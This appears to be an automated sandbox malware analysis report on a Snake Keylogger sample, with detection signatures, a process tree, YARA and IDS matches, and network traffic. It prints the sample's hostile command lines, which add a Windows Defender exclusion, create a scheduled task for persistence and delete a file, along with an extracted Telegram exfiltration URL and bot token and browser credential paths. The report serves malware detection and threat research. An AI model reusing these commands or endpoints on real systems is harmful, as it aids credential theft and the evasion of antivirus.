Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1583466
MD5: 92e84c83303cdc492eaaed0e1e4b79c6
SHA1: ce2f5255abed1a4b241ecdd627f6d247594904ae
SHA256: 82107247e3738a1675cf511dd4c051fb438dd1a973171318e960b406246fcf93
Tags: NET, exe, MSIL, SnakeKeylogger, user-jstrosch

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 3752 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 92E84C83303CDC492EAAED0E1E4B79C6)
    • powershell.exe (PID: 6528 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7416 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5452 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7276 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • cmd.exe (PID: 7768 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • choice.exe (PID: 7824 cmdline: choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • aVmZDnwW.exe (PID: 7328 cmdline: C:\Users\user\AppData\Roaming\aVmZDnwW.exe MD5: 92E84C83303CDC492EAAED0E1E4B79C6)
    • schtasks.exe (PID: 7576 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmpB1B3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7620 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • cmd.exe (PID: 7896 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • choice.exe (PID: 7964 cmdline: choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7822875840:AAE1dEB39_r2yuQHwPOz--iI8ECcmIivnQs/sendMessage?chat_id=7342994424", "Token": "7822875840:AAE1dEB39_r2yuQHwPOz--iI8ECcmIivnQs", "Chat_id": "7342994424", "Version": "5.1"}
Source | Rule | Description | Author | Strings
00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x14968:$a1: get_encryptedPassword
  • 0x14c54:$a2: get_encryptedUsername
  • 0x14774:$a3: get_timePasswordChanged
  • 0x1486f:$a4: get_passwordField
  • 0x1497e:$a5: set_encryptedPassword
  • 0x15fe3:$a7: get_logins
  • 0x15f46:$a10: KeyLoggerEventArgs
  • 0x15bb1:$a11: KeyLoggerEventArgsEventHandler
00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_SnakeKeylogger | Detects Snake Keylogger | ditekSHen
  • 0x19974:$x1: $%SMTPDV$
  • 0x18358:$x2: $#TheHashHere%&
  • 0x1991c:$x3: %FTPDV$
  • 0x182f8:$x4: $%TelegramDv$
  • 0x15bb1:$x5: KeyLoggerEventArgs
  • 0x15f46:$x5: KeyLoggerEventArgs
  • 0x19940:$m2: Clipboard Logs ID
  • 0x19b7e:$m2: Screenshot Logs ID
  • 0x19c8e:$m2: keystroke Logs ID
  • 0x19f68:$m3: SnakePW
  • 0x19b56:$m4: \SnakeKeylogger\
00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Source | Rule | Description | Author | Strings
7.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
7.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
7.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
7.2.RegSvcs.exe.400000.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x14b68:$a1: get_encryptedPassword
  • 0x14e54:$a2: get_encryptedUsername
  • 0x14974:$a3: get_timePasswordChanged
  • 0x14a6f:$a4: get_passwordField
  • 0x14b7e:$a5: set_encryptedPassword
  • 0x161e3:$a7: get_logins
  • 0x16146:$a10: KeyLoggerEventArgs
  • 0x15db1:$a11: KeyLoggerEventArgsEventHandler
7.2.RegSvcs.exe.400000.0.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x1c53c:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x1b76e:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x1bba1:$a4: \Orbitum\User Data\Default\Login Data
  • 0x1cbe0:$a5: \Kometa\User Data\Default\Login Data

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3752, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe", ProcessId: 6528, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3752, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe", ProcessId: 6528, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmpB1B3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmpB1B3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\aVmZDnwW.exe, ParentImage: C:\Users\user\AppData\Roaming\aVmZDnwW.exe, ParentProcessId: 7328, ParentProcessName: aVmZDnwW.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmpB1B3.tmp", ProcessId: 7576, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3752, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp", ProcessId: 5452, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3752, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe", ProcessId: 6528, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3752, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp", ProcessId: 5452, ProcessName: schtasks.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-02T20:19:47.624321+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49728 | 188.114.97.3 | 443 | TCP
2025-01-02T20:19:51.758223+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49744 | 188.114.97.3 | 443 | TCP
2025-01-02T20:19:52.688347+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49752 | 188.114.97.3 | 443 | TCP
2025-01-02T20:19:56.799969+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49790 | 188.114.97.3 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-02T20:19:45.728728+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49724 | 193.122.130.0 | 80 | TCP
2025-01-02T20:19:47.151066+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49724 | 193.122.130.0 | 80 | TCP
2025-01-02T20:19:48.244406+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49729 | 193.122.130.0 | 80 | TCP
2025-01-02T20:19:49.494395+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49732 | 193.122.130.0 | 80 | TCP
2025-01-02T20:19:50.244444+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49734 | 193.122.130.0 | 80 | TCP
2025-01-02T20:19:50.619445+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49736 | 193.122.130.0 | 80 | TCP
2025-01-02T20:19:51.166282+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49734 | 193.122.130.0 | 80 | TCP
2025-01-02T20:19:52.385016+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49750 | 193.122.130.0 | 80 | TCP
2025-01-02T20:19:53.510035+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49761 | 193.122.130.0 | 80 | TCP

AV Detection

Source: 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7822875840:AAE1dEB39_r2yuQHwPOz--iI8ECcmIivnQs/sendMessage?chat_id=7342994424", "Token": "7822875840:AAE1dEB39_r2yuQHwPOz--iI8ECcmIivnQs", "Chat_id": "7342994424", "Version": "5.1"}
Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | ReversingLabs: Detection: 71%
Source: file.exe | ReversingLabs: Detection: 71%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Joe Sandbox ML: detected
Source: file.exe | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org

Compliance

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.510000.0.unpack
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49725 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49737 version: TLS 1.0
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-38h] (0_2_029AD208)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-38h] (0_2_029AB09C)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then jmp 0998A6F4h (0_2_0998A92B)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h (0_2_0A0A2288)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h (0_2_0A0A5FAF)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then xor edx, edx (0_2_0A0A6374)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then xor edx, edx (0_2_0A0A6380)
Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 4x nop then jmp 09DB95DCh (8_2_09DB9813)

              Networking

              barindex
              Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.44d29e8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.446dbc8.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4408da8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, type: UNPACKEDPE
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49729 -> 193.122.130.0:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49750 -> 193.122.130.0:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49761 -> 193.122.130.0:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49736 -> 193.122.130.0:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49734 -> 193.122.130.0:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49732 -> 193.122.130.0:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49724 -> 193.122.130.0:80
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49744 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49728 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49752 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49790 -> 188.114.97.3:443
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49725 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49737 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
